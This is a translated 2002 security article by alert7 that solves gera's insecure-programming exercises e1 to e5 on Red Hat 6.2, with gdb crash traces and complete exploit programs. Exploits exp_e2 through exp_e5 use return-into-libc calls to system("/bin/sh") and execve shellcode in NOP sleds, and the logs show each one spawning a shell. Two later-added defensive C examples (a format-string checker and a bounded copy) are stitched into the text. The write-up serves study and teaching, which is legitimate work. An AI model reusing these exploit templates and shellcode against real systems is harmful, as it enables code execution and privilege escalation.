Advanced
Creation time: 2002-01-17
Article attribute: original
Article source: http://www.xfocus.org/
Article submission: alert7 (sztcww_at_sina.com)
By alert7
Home: http://www.xfocus.org/ http://www.whitecell.org/
Company: Huatai Net Anne (http://www.netguard.com.cn)
Time: 2002-1-17
★★ Part 3: Advanced
Test environment: Redhat 6.2, glibc 2.1.3
★ 3.1 Demo 1
/* e1.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* jumpy vfprintf, batman! */
#include <stdio.h>
int main(int argv, char **argc) {
    /* can you do it changing the stack? */
    /* can you do it without changing it? */
    printf(argc[1]);
    while(1);
}
Please refer to <<Using a format string to overwrite the return address of the *printf() function itself>>.
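An added illustration (my own example code, not gera's exercise and not alert7's): the repair for e1.c is to pass untrusted text as an argument under a fixed format, never as the format itself, and a reviewer can mechanically flag strings that printf() would interpret. has_format_directive() and the other names below are hypothetical; the check treats any '%' that is not followed by a second '%' as a directive, which is deliberately broader than the single case in e1.c, so it also flags a literal such as "Live at 100%!" whose '!' is not a valid conversion. The sample inputs are constructed.

```c
#include <stdio.h>

/* Return 1 if printf() would interpret anything in s as a conversion,
 * 0 if it is safe to use as a format.  Only "%%" is treated as literal;
 * a '%' followed by anything else, including an unknown character or the
 * end of the string, counts as a directive. */
int has_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent sign, skip both */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* The fix for e1.c: argv[1] goes in as data under a fixed format.
 * Returns what printf() returns (bytes written, or -1 on error). */
int print_untrusted(const char *s)
{
    return printf("%s", s);
}

/* Review helper: prints the string safely either way, and reports whether
 * handing it to printf() as the format (as e1.c does) would have been a
 * format-string bug.  0 = plain text, 1 = contains a directive. */
int check_and_print(const char *s)
{
    int risky = has_format_directive(s);
    print_untrusted(s);
    putchar('\n');
    return risky;
}

int main(int argc, char **argv)
{
    /* constructed samples; a real argv[1] is handled the same way */
    const char *samples[] = { "hello", "100%% done", "%x%x%x%n", "Live at 100%!" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("directive=%d text=", has_format_directive(samples[i]));
        check_and_print(samples[i]);
    }
    if (argc > 1)
        printf("argv[1]: directive=%d\n", check_and_print(argv[1]));
    return 0;
}
```

Compile with `gcc -Wformat -o fmtcheck fmtcheck.c` and run it with an argument; modern gcc also warns at compile time about `printf(argc[1])` when -Wformat-security is on, which is the cheapest place to catch the e1.c pattern.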
★ 3.2 Demo 2
/* e2.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* Now your mission is to make abo1 act like this other program:
 *
 *    char buf[100];
 *    while (1) {
 *        scanf("%100s", buf);
 *        system(buf);
 *    }
 *
 * But, you cannot execute code in stack.
 */
#include <string.h>
int main(int argv, char **argc) {
    char buf[256];
    strcpy(buf, argc[1]);
}
The only condition we need to satisfy is that the stack is non-executable.
[alert7@redhat62 alert7]$ ./e2 `perl -e 'print "a"x264'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e2 core -q
Core was generated by `./e2 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x61616161 in ?? ()
/* exp_e2.c
 * alert7 exploit for e2
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET_POSITION 260
#define NOP 0x90
#define BUFADDR 0xbffff968
#define SYSTEM 0x4005aae0
char shell[] = "/bin/sh";           /* .string "/bin/sh" */
int main(int argc, char **argv)
{
    char buff[1024], *ptr;
    int retaddr;
    int i;
    retaddr = SYSTEM;
    if (argc > 1)
        retaddr = SYSTEM + atoi(argv[1]);
    bzero(buff, 1024);
    for (i = 0; i < 300; i++)
        buff[i] = NOP;
    *((long *)&(buff[RET_POSITION-4])) = BUFADDR + 4*3 + strlen(shell);   /* saved EBP */
    *((long *)&(buff[RET_POSITION]))   = retaddr;                          /* EIP: system() */
    *((long *)&(buff[RET_POSITION+4])) = 0xaabbccdd;                       /* EIP once system() returns */
    *((long *)&(buff[RET_POSITION+8])) = BUFADDR + RET_POSITION + 4*3;     /* argument pointer -> "/bin/sh" */
    ptr = buff + RET_POSITION + 12;
    strcpy(ptr, shell);
    printf("Jump to 0x%08x\n", retaddr);
    execl("./e2", "e2", buff, 0);
}
[alert7@redhat]$ gcc -o exp_e2 exp_e2.c
[alert7@redhat]$ ./exp_e2
Jump to 0x4005aae0
bash$ id
uid=501(alert7) gid=501(alert7) groups=501(alert7)
bash$ exit
exit
Segmentation fault (core dumped)
Memory growth direction
------>
| xxxxxx | EBP | EIP | EIP1 | argument pointer | /bin/sh |
|  260 bytes   |     |
                     |
                     |-> ESP after main executes ret (EBP now holds the EBP value written above)
EIP1 is the return address for the system() call (that is, where it goes if system() ever returns).
The argument pointer points to /bin/sh.
Here we set EIP1 to 0xaabbccdd, so when /bin/sh exits, control returns to 0xaabbccdd and the program core dumps.
In other words, as long as we construct the frames carefully, we can build a chain of function calls. For example, we could call
setuid(0) -> system("/bin/sh") -> exit(0);
This exploit succeeds largely because the address of system() contains no zero byte, that is, the non-executable stack patch does not mmap the shared libraries into low memory.
For more on defeating non-executable stack patches, see:
<<Methods of bypassing Linux non-executable stack protection>> by warning3
and, in the recent Phrack 58:
<<The advanced return-into-lib(c) exploits>> by Nergal
★ 3.3 Demo 3
/* e3.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* Are you an environmental threat? */
#include <stdlib.h>
#include <string.h>
char buf[256];
int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    setenv("ABO", argc[2], 1);
    while(1);
}
[alert7@redhat]$ uname -a
Linux redhat 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
[alert7@redhat]$ gcc -o e3 e3.c -static   // compiled statically again
[alert7@redhat]$ ./e3 `perl -e 'print "a"x267'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e3 core -q
Core was generated by `./e3 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e3 `perl -e 'print "a"x268'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e3 core -q
Core was generated by `./e3 aaaaaaaa... a'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x804ac85 in __libc_realloc (oldmem=0x0, bytes=88) at malloc.c:3209
#2  0x804d18b in realloc_hook_ini (ptr=0x0, sz=88, caller=0x804857c) at malloc.c:1770
#3  0x804abb3 in __libc_realloc (oldmem=0x0, bytes=88) at malloc.c:3196
#4  0x804857c in __add_to_environ (name=0x80718e8 "ABO", value=0xbffffcc8 "a", combined=0x0, replace=1) at ../sysdeps/generic/setenv.c:145
#5  0x804882b in __setenv (name=0x80718e8 "ABO", value=0xbffffcc8 "a", replace=1) at ../sysdeps/generic/setenv.c:263
#6  0x80481ce in main ()
#7  0x804831b in __libc_start_main (main=0x80481a0, argv=0xbffffb24, init=0x80480b4 <_init>, fini=0x80718ac <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
Given the above, we don't actually need to care what happens inside setenv(); it is enough to know that the value placed at buf+264 becomes EIP.
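As an added example (not from the article; the struct and function names are my own), the mechanism behind demos 2 and 3, an unbounded strcpy() into a 256-byte buffer running over whatever sits after it, can be modelled without a debugger. `struct globals` stands in for e3's global buf[] with a function pointer 264 bytes after its start, the offset at which the run above lands in EIP; the article later identifies the real neighbour in the static binary as the __libc_internal_tsd_get pointer, and this layout is only a model of that situation, not glibc's. unchecked_copy() reproduces strcpy's effect with a memmove kept inside the object, checked_copy() is the bounded replacement that refuses anything that does not fit together with its NUL, and the 268-byte input is constructed to match `perl -e 'print "a"x268'`.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of e3's data layout: a 256-byte global buffer with a function
 * pointer 264 bytes after its start (hypothetical struct, chosen to match
 * the offset at which the article's e3 run overwrites EIP). */
struct globals {
    char     buf[256];
    uint32_t pad[2];            /* 8 bytes of unrelated data in between */
    void   (*hook)(void);       /* the pointer that strcpy() runs into */
};

static void benign_hook(void) { }

struct globals g = { {0}, {0, 0}, benign_hook };

/* Constructed sample: 268 'a' bytes, like perl -e 'print "a"x268' above. */
#define SAMPLE_LEN 268
static char sample[SAMPLE_LEN + 1];

const char *make_sample(void)
{
    memset(sample, 'a', SAMPLE_LEN);
    sample[SAMPLE_LEN] = '\0';
    return sample;
}

/* What strcpy(buf, argv[1]) does: writes len bytes from the start of buf
 * with no regard for its size.  Done here as a memmove over the enclosing
 * object (capped at sizeof g) so the model itself stays within defined
 * behaviour while still landing on g.hook exactly as the real overflow does. */
void unchecked_copy(const char *src, size_t len)
{
    if (len > sizeof g)
        len = sizeof g;
    memmove((char *)&g, src, len);
}

/* The bounded replacement: copy only if src and its NUL fit in dst; leave
 * dst untouched and return -1 otherwise.  Returns 0 on success. */
int checked_copy(char *dst, size_t dstsz, const char *src)
{
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL)            /* no NUL inside dstsz bytes: would overflow */
        return -1;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Low 32 bits of the hook pointer, so a test can inspect it without ever
 * calling through it. */
uint32_t hook_low32(void)
{
    return (uint32_t)(uintptr_t)g.hook;
}

/* Unchecked path: after the copy the hook reads 0x61616161 ("aaaa" in
 * little-endian order), the value the article sees in EIP.  Returns 1 if so. */
int demo_unchecked(void)
{
    g.hook = benign_hook;
    unchecked_copy(make_sample(), SAMPLE_LEN);
    return hook_low32() == 0x61616161u;
}

/* Checked path: the over-long input is rejected and the hook survives.
 * Returns 1 if both hold. */
int demo_checked(void)
{
    g.hook = benign_hook;
    int rc = checked_copy(g.buf, sizeof g.buf, make_sample());
    return rc == -1 && g.hook == benign_hook;
}

int main(void)
{
    printf("offset of hook: %zu\n", offsetof(struct globals, hook));
    printf("unchecked copy clobbered hook: %s\n", demo_unchecked() ? "yes" : "no");
    printf("checked copy rejected input, hook intact: %s\n", demo_checked() ? "yes" : "no");
    return 0;
}
```

The point of the model is the bounded copy: once the length check is in place the distance from buf to the next function pointer no longer matters, whereas with strcpy() every global or stack frame that follows the buffer is reachable, which is exactly what the setenv() and realloc hook frames in the backtrace above show.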
/* exp_e3.c
 * alert7 exploit for static e3
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET_POSITION 264
#define NOP 0x90
#define BUFADDR 0x807bf60   // 0xaabbccdd
char shellcode[] =
    "\xeb\x1f"                  /* jmp    0x1f              */
    "\x5e"                      /* popl   %esi              */
    "\x89\x76\x08"              /* movl   %esi,0x8(%esi)    */
    "\x31\xc0"                  /* xorl   %eax,%eax         */
    "\x88\x46\x07"              /* movb   %eax,0x7(%esi)    */
    "\x89\x46\x0c"              /* movl   %eax,0xc(%esi)    */
    "\xb0\x0b"                  /* movb   $0xb,%al          */
    "\x89\xf3"                  /* movl   %esi,%ebx         */
    "\x8d\x4e\x08"              /* leal   0x8(%esi),%ecx    */
    "\x8d\x56\x0c"              /* leal   0xc(%esi),%edx    */
    "\xcd\x80"                  /* int    $0x80             */
    "\x31\xdb"                  /* xorl   %ebx,%ebx         */
    "\x89\xd8"                  /* movl   %ebx,%eax         */
    "\x40"                      /* inc    %eax              */
    "\xcd\x80"                  /* int    $0x80             */
    "\xe8\xdc\xff\xff\xff"      /* call   -0x24             */
    "/bin/sh";                  /* .string "/bin/sh"        */
int main(int argc, char **argv)
{
    char buff[1024], *ptr;
    int retaddr;
    int i;
    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);
    bzero(buff, 1024);
    for (i = 0; i < 1024; i += 4)
        *((long *)&(buff[i])) = retaddr;
    for (i = 0; i < 100; i++)
        buff[i] = NOP;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[1023] = '\0';          /* keep the argument NUL-terminated */
    /* buff now looks like: nnnnnnnnnnssssssssssssssaaaaaaaaaaaaaaaa\0
     * (nops, shellcode, then the return address repeated) */
    printf("Jump to 0x%08x\n", retaddr);
    execl("./e3", "e3", buff, 0);
}
[alert7@redhat62 alert7]$ gcc -o exp_e3 exp_e3.c
[alert7@redhat62 alert7]$ ./exp_e3
Jump to 0x0807bf60
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
success :)
The shellcode lives in the heap, so this may bypass some protections of the stack; but the address of the shellcode in the heap has to be guessed, which loses some generality.
After tracing the problem in __libc_malloc() for half a day, I found this (still in the statically compiled binary):
0x8049ff5 <__libc_malloc+89>:   mov    0x807c068,%eax
0x8049ffa <__libc_malloc+94>:   test   %eax,%eax
0x8049ffc <__libc_malloc+96>:   je     0x804a010 <__libc_malloc+116>
0x8049ffe <__libc_malloc+98>:   push   $0x0
0x804a000 <__libc_malloc+100>:  call   *%eax
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) x 0x807c068
0x807c068 <__libc_internal_tsd_get>:    0x61616161
(gdb) p &__libc_internal_tsd_get
$1 = (void *(**)()) 0x807c068
(gdb) p __libc_internal_tsd_get
$2 = (void *(*)()) 0x61616161
Our data overwrites the function pointer __libc_internal_tsd_get, so that __libc_internal_tsd_get() points to 0x61616161, hence the segmentation fault. What __libc_internal_tsd_get() is for here, I don't know yet; depressing ~
★ 3.4 Demo 4
/* e4.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* %what the hell? */
#include <stdio.h>
#include <string.h>
char buf[256];
int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    printf("Live at 100%!");
    while(1);
}
[alert7@redhat]$ gcc -o e4 e4.c -static   // still compiled statically
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1408'`
[alert7@redhat]$ ./e4 `perl -e 'print "a"x1409'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb -q e4 core
Core was generated by `./e4 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x8048681 in printf (format=0x8071548 "Live at 100%!") at printf.c:31
#2  0x80481c3 in main ()
#3  0x804831b in __libc_start_main (main=0x80481a0, argv=0xbffff6a4, init=0x80480b4 <_init>, fini=0x807150c <_fini>, rtld_fini=0, stack_end=0xbffff69c) at ../sysdeps/generic/libc-start.c:92
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x518'``perl -e 'print "b"x891'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaa...bbbbbbbb...'.
#0  0x62626161 in ?? ()
[alert7@redhat62 alert7]$ ./e4 `perl -e 'print "a"x516'``perl -e 'print "b"x893'`
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ gdb e4 core -q
Core was generated by `./e4 aaaaaaaa...bbbbbbbb...'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626262 in ?? ()
Given the above, we don't actually need to care what happens inside printf(); it is enough to know that the value placed at buf+516 becomes EIP.
/* exp_e4.c
 * alert7 exploit for static e4
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET_POSITION 516
#define NOP 0x90
#define BUFADDR 0x807bbc0   // 0xaabbccdd
char shellcode[] =
    "\xeb\x1f"                  /* jmp    0x1f              */
    "\x5e"                      /* popl   %esi              */
    "\x89\x76\x08"              /* movl   %esi,0x8(%esi)    */
    "\x31\xc0"                  /* xorl   %eax,%eax         */
    "\x88\x46\x07"              /* movb   %eax,0x7(%esi)    */
    "\x89\x46\x0c"              /* movl   %eax,0xc(%esi)    */
    "\xb0\x0b"                  /* movb   $0xb,%al          */
    "\x89\xf3"                  /* movl   %esi,%ebx         */
    "\x8d\x4e\x08"              /* leal   0x8(%esi),%ecx    */
    "\x8d\x56\x0c"              /* leal   0xc(%esi),%edx    */
    "\xcd\x80"                  /* int    $0x80             */
    "\x31\xdb"                  /* xorl   %ebx,%ebx         */
    "\x89\xd8"                  /* movl   %ebx,%eax         */
    "\x40"                      /* inc    %eax              */
    "\xcd\x80"                  /* int    $0x80             */
    "\xe8\xdc\xff\xff\xff"      /* call   -0x24             */
    "/bin/sh";                  /* .string "/bin/sh"        */
int main(int argc, char **argv)
{
    char buff[2048], *ptr;
    int retaddr;
    int i;
    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);
    bzero(buff, 2048);
    for (i = 0; i < 2000; i++)
        buff[i] = NOP;
    *((long *)&(buff[RET_POSITION])) = retaddr;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    printf("Jump to 0x%08x\n", retaddr);
    execl("./e4", "e4", buff, 0);
}
[alert7@redhat62 alert7]$ ./exp_e4
Jump to 0x0807bbc0
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
success :)
Generality: there is no need to guess BUFADDR.
The problem in the program:
0x8050101 <_IO_vfprintf+9361>:  mov    0x807bd40(,%edx,4),%edx
0x8050108 <_IO_vfprintf+9368>:  test   %edx,%edx        // edx = 0x62626262
0x805010a <_IO_vfprintf+9370>:  je     0x8050130 <_IO_vfprintf+9408>
0x805010c <_IO_vfprintf+9372>:  add    $0x28,%eax
0x805010f <_IO_vfprintf+9375>:  push   %eax
0x8050110 <_IO_vfprintf+9376>:  push   $0x1
0x8050112 <_IO_vfprintf+9378>:  mov    0xffffab4(%ebp),%ecx
0x8050118 <_IO_vfprintf+9384>:  push   %ecx
0x8050119 <_IO_vfprintf+9385>:  call   *%edx            // the problem is here
(gdb) x 0x807bd40
0x807bd40 <__printf_arginfo_table>:     0x61616161
Whenever printf() meets "%x" where x is an unknown or user-registered conversion, it looks up __printf_arginfo_table and calls the corresponding function to interpret the format; since the __printf_arginfo_table array is covered by our data, we get control. This is my rough understanding; a detailed analysis of printf's execution path would be needed to be sure. If I am wrong, please correct me.
★ 3.5 Demo 5
/* e5.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */
/* Is this possible? */
#include <stdio.h>
#include <string.h>
char buf[256];
int main(int argv, char **argc) {
    strcpy(buf, argc[1]);
    perror(argc[2]);
    while(1);
}
When compiled statically:
(gdb) p &buf
$1 = (char (*)[256]) 0x807bc00
[alert7@redhat]$ gcc -o e5 e5.c -static
[alert7@redhat]$ ./e5 `perl -e 'print "a"x255'` a
a: Success
[alert7@redhat]$ ./e5 `perl -e 'print "a"x256'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa... a'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x807a000, nb=48) at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) bt
#0  chunk_alloc (ar_ptr=0x807a000, nb=48) at malloc.c:2762
#1  0x8049cf4 in __libc_malloc (bytes=44) at malloc.c:2696
#2  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0, language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_code=0x0, modifier=0x0, special=0x0, sponsor=0x0, revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#3  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US", domainname=0xbffff630 "LC_MESSAGES/libc.mo") at finddomain.c:113
#4  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#5  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#6  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#7  0x80481c7 in main ()
#8  0x804831b in __libc_start_main (main=0x80481a0, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
(gdb)
[alert7@redhat]$ ./e5 `perl -e 'print "a"x257'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8070061, nb=48) at malloc.c:2762
2762    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x258'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x8006161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x259'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x616161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x260'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  chunk_alloc (ar_ptr=0x61616161, nb=48) at malloc.c:2752
2752    malloc.c: No such file or directory.
./e5 `perl -e 'print "a"x260'` a through ./e5 `perl -e 'print "a"x264'` a all behave as above.
[alert7@redhat]$ ./e5 `perl -e 'print "a"x265'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa... a'.
Program terminated with signal 11, Segmentation fault.
#0  0x61 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x266'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  0x6161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x267'` a
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa... a'.
Program terminated with signal 11, Segmentation fault.
#0  0x616161 in ?? ()
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x268'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) bt
#0  0x61616161 in ?? ()
#1  0x804e74a in _nl_make_l10nflist (l10nfile_list=0x807b434, dirlist=0x8071795 "/usr/share/locale", dirlist_len=18, mask=0, language=0xbffff628 "en_US", territory=0x0, codeset=0x0, normalized_code=0x0, modifier=0x0, special=0x0, sponsor=0x0, revision=0x0, filename=0xbffff630 "LC_MESSAGES/libc.mo", do_allocate=0) at l10nflist.c:201
#2  0x804dd30 in _nl_find_domain (dirname=0x8071795 "/usr/share/locale", locale=0xbffff628 "en_US", domainname=0xbffff630 "LC_MESSAGES/libc.mo") at finddomain.c:113
#3  0x804d8b0 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:395
#4  0x804d06d in __strerror_r (errnum=0, buf=0xbffff6cc "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#5  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#6  0x80481c7 in main ()
#7  0x804831b in __libc_start_main (main=0x80481a0, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffb1c) at ../sysdeps/generic/libc-start.c:92
./e5 `perl -e 'print "a"x268'` a through ./e5 `perl -e 'print "a"x364'` a all behave as above.
[alert7@redhat]$ ./e5 `perl -e 'print "a"x365'`
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa...'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61     97
(gdb) quit
[alert7@redhat]$ ./e5 `perl -e 'print "a"x368'` a   // same as before
Segmentation fault (core dumped)
[alert7@redhat]$ gdb e5 core -q
Core was generated by `./e5 aaaaaaaa... a'.
Program terminated with signal 11, Segmentation fault.
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
282     dcgettext.c: No such file or directory.
(gdb) x/i 0x804d683
0x804d683 <__dcgettext+67>:     pushl  0x4(%eax)
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) bt
#0  0x804d683 in __dcgettext (domainname=0x8071786 "libc", msgid=0x80727d4 "Success", category=5) at dcgettext.c:282
#1  0x804d06d in __strerror_r (errnum=0, buf=0xbffff65c "", buflen=1024) at ../sysdeps/generic/_strerror.c:68
#2  0x80486ae in perror (s=0xbffffcc8 "a") at perror.c:38
#3  0x80481c7 in main ()
#4  0x804831b in __libc_start_main (main=0x80481a0, fini=0x807155c <_fini>, rtld_fini=0, stack_end=0xbffffaac) at ../sysdeps/generic/libc-start.c:92
So the length of argv[1] is limited to the range 268 to 364, and buff+264 is EIP.
/* exp_e5.c
 * alert7 exploit for static e5
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define RET_POSITION 264
#define NOP 0x90
#define BUFADDR 0x807bc00   // 0xaabbccdd
char shellcode[] =
    "\xeb\x1f"                  /* jmp    0x1f              */
    "\x5e"                      /* popl   %esi              */
    "\x89\x76\x08"              /* movl   %esi,0x8(%esi)    */
    "\x31\xc0"                  /* xorl   %eax,%eax         */
    "\x88\x46\x07"              /* movb   %eax,0x7(%esi)    */
    "\x89\x46\x0c"              /* movl   %eax,0xc(%esi)    */
    "\xb0\x0b"                  /* movb   $0xb,%al          */
    "\x89\xf3"                  /* movl   %esi,%ebx         */
    "\x8d\x4e\x08"              /* leal   0x8(%esi),%ecx    */
    "\x8d\x56\x0c"              /* leal   0xc(%esi),%edx    */
    "\xcd\x80"                  /* int    $0x80             */
    "\x31\xdb"                  /* xorl   %ebx,%ebx         */
    "\x89\xd8"                  /* movl   %ebx,%eax         */
    "\x40"                      /* inc    %eax              */
    "\xcd\x80"                  /* int    $0x80             */
    "\xe8\xdc\xff\xff\xff"      /* call   -0x24             */
    "/bin/sh";                  /* .string "/bin/sh"        */
int main(int argc, char **argv)
{
    char buff[300], *ptr;
    int retaddr;
    int i;
    retaddr = BUFADDR;
    if (argc > 1)
        retaddr = BUFADDR + atoi(argv[1]);
    bzero(buff, 300);
    for (i = 0; i < 299; i++)
        buff[i] = NOP;
    *((long *)&(buff[RET_POSITION])) = retaddr;
    ptr = buff + 50;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    printf("Jump to 0x%08x\n", retaddr);
    execl("./e5", "e5", buff, "a", 0);
}
[alert7@redhat62 alert7]$ ./exp_e5
Jump to 0x0807bc00      // contains a \0, :(
Segmentation fault (core dumped)
[alert7@redhat62 alert7]$ ./exp_e5 1
Jump to 0x0807bc01
bash$ id
uid=502(alert7) gid=502(alert7) groups=502(alert7)
success :)
The same thing as in 3.3 shows up here too:
(gdb) disass __libc_malloc
Dump of assembler code for function __libc_malloc:
...
0x8049c95 <__libc_malloc+89>:   mov    0x807bd08,%eax
0x8049c9a <__libc_malloc+94>:   test   %eax,%eax
0x8049c9c <__libc_malloc+96>:   je     0x8049cb0 <__libc_malloc+116>
0x8049c9e <__libc_malloc+98>:   push   $0x0
0x8049ca0 <__libc_malloc+100>:  call   *%eax
...
(gdb) i reg eax
eax            0x61616161       1633771873
(gdb) x 0x807bd08
0x807bd08 <__libc_internal_tsd_get>:    0x61616161
(gdb) p &__libc_internal_tsd_get
$2 = (void *(**)()) 0x807bd08
(gdb) p __libc_internal_tsd_get
$3 = (void *(*)()) 0x61616161
This is the same problem as in 3.3.
★ Summary:
Gera is like a teacher who set this exam paper, and I am a student who has sat it; if I have got something wrong, please correct me, teachers, or let's discuss anything at all. Where I am wrong I will correct it, and where I am not I will take it as encouragement. Thanks again to gera@core-sdi.com for giving us this exam paper.
http://community.core-sdi.com/~gera/insecureprogramming/insecureprogramming.tar.gz